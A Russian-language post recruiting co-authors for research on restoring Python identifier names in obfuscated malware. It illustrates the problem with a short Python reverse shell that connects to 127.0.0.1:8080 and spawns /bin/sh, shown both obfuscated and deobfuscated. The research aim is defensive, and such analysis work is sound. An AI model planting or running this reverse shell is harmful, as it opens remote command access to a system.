#вак #статьи Ищу аспирантов, академических исследователей и просто студентов, которые хотят впрячься в соавторство для написания ваковских статей (?). Скоро начну ресёрч по общей теме "Восстановление контекста имён после воздействия обфускаторов кода", он будет посвящен восстановлению названий переменных, функций и классов (всё это "names" в понимании питона) после воздействия на них обфускаторов типа oxypy: До: import socket, os, pty def O00OO000O0000OOOO(OOO0OOO0O0000OOO0, OO0OO0O0OO0OO00O0): OOOO0OOOO0OOO0O00 = socket.socket() OOOO0OOOO0OOO0O00.connect((OOO0OOO0O0000OOO0, OO0OO0O0OO0OO00O0)) [os.dup2(OOOO0OOOO0OOO0O00.fileno(),O0O00O0O00O000O00) for O0O00O0O00O000O00 in (0, 1, 2)] pty.spawn ("/bin/sh") if name == "main": O00OO000O0000OOOO("127.0.0.1",8080) После: import socket,os,pty def main(host, port): s=socket.socket() s.connect((host, port)) [os.dup2(s.fileno(), fd) for fd in (0,1,2)] pty.spawn("/bin/sh") if name == "main": main("127.0.0.1", 8080) Решаемая задача: борьба с обфускацией в малвари в контексте Python Чем будем заниматься: - Анализировать опенсорс (в том числе эксплоиты и малварь) для того, чтобы получить статистическую модель названий переменных, функций, классов и методов в зависимости от условий, присваиваемых значений, передаваемых переменных и применять ее на обфусцированный код - Сравнивать различные обфускаторы, которые могут в переименование имён (oxypy, pyminifier) и самописный (который будет создаваться с учётом опыта, полученного при анализе опенсорса, и позволит оценить результат прошлого пункта) и натравливать их на нашу модель для получения статы - Потехи ради посмотреть, как ML может помочь в решении этой задачи (по факту тренировочные данные можно генерировать до бесконечности, ведь примеров кода много, а получать его обфусцированную версию очень просто) Собственно, это выльется в несколько ВАК-публикаций и как минимум одно выступление на конференциях по ИБ/Python. Ищу уверенных в себе питонистов, которым будет интересно исследовать эту тему, так как эту тему судя по elibrary никто не брал, хотя сама идея лежит на поверхности. Кому интересно подискутировать - welcome to comments.